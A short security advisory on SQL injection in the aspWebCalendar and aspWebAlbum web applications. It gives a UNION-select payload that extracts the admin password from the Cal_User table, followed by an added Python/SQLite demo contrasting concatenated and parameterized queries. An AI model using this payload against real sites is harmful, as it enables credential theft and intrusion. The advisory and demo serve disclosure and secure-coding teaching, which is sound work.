Full Revolution aspWebCalendar and aspWebAlbum Multiple SQL Injection Vulnerabilities

No exploit is required to leverage this issue. The following proof of concept exploits have been provided:

Entering the following text into an offending field or passing it through an offending parameter will yield the administrator password and present it to the attacker:

' union select Cal_User_Password,1,1,1,1,1,1,1,1,1 from Cal_User where Cal_User_UserName = 'admin'--
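
Why the string above works against a concatenated query and does nothing against a parameterized one, as an added example that is not part of the original advisory or the vendor's code. It uses SQLite as a stand-in for the application's database; the Cal_Event table, its columns c1 to c10 and the stored password value are assumptions constructed for the demonstration (only Cal_User and its two column names come from the advisory).

```python
import sqlite3

# Payload as given in the advisory, joined onto one line.
PAYLOAD = ("' union select Cal_User_Password,1,1,1,1,1,1,1,1,1 from Cal_User "
           "where Cal_User_UserName = 'admin'--")


def build_db():
    """Constructed in-memory database. Cal_User and its columns are named in
    the advisory; Cal_Event (ten columns) is a hypothetical lookup target."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Cal_User "
               "(Cal_User_UserName TEXT, Cal_User_Password TEXT)")
    db.execute("INSERT INTO Cal_User VALUES ('admin', 'constructed-secret')")
    cols = ", ".join(f"c{i} TEXT" for i in range(1, 11))
    db.execute(f"CREATE TABLE Cal_Event ({cols})")
    db.execute("INSERT INTO Cal_Event (c1) VALUES ('Team meeting')")
    return db


def search_concatenated(db, title):
    # Vulnerable pattern: user input becomes part of the SQL text, so the
    # quote closes the literal, the UNION appends a second SELECT with a
    # matching column count, and "--" comments out the trailing quote.
    sql = "SELECT * FROM Cal_Event WHERE c1 = '" + title + "'"
    return db.execute(sql).fetchall()


def search_parameterized(db, title):
    # Hardened pattern: the input is bound as a value and is only ever
    # compared against c1; it is never parsed as SQL.
    sql = "SELECT * FROM Cal_Event WHERE c1 = ?"
    return db.execute(sql, (title,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("concatenated :", search_concatenated(db, PAYLOAD))
    print("parameterized:", search_parameterized(db, PAYLOAD))
    print("normal lookup:", search_parameterized(db, "Team meeting"))
```

In the ASP application itself the equivalent of the hardened form is a parameterized ADODB.Command in place of string-built SQL.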


 

Copyright 2010, SecurityFocus